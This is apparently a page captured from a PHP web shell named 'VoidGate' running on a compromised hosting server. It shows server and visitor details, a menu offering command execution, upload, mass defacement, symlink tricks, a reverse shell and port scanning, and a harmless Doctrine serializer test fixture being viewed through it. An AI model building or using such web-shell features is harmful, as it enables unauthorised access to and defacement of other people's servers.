ヤミRoot VoidGate
User / IP
:
216.73.216.33
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
vendor
/
jms
/
serializer
/
tests
/
Fixtures
/
Doctrine
/
IdentityFields
/
Viewing: Server.php
<?php namespace JMS\Serializer\Tests\Fixtures\Doctrine\IdentityFields; use Doctrine\ORM\Mapping as ORM; use JMS\Serializer\Annotation as Serializer; /** @ORM\Entity */ class Server { /** * @ORM\Id * @ORM\Column(type="string", name="ip_address") * @Serializer\Type("string") * @var string */ protected $ipAddress; /** * @ORM\Id * @ORM\Column(type="string", name="server_id") * @Serializer\SerializedName("server_id_extracted") * @Serializer\Type("string") * @var string */ protected $serverId; /** * @ORM\Column(type="string") * @Serializer\Type("string") * @var string */ private $name; /** * Server constructor. * @param string $name * @param string $ipAddress * @param string $serverId */ public function __construct($name, $ipAddress, $serverId) { $this->name = $name; $this->ipAddress = $ipAddress; $this->serverId = $serverId; } /** * @return string */ public function getName() { return $this->name; } /** * @return string */ public function getIpAddress() { return $this->ipAddress; } /** * @return string */ public function getServerId() { return $this->serverId; } }
Coded With 💗 by
0x6ick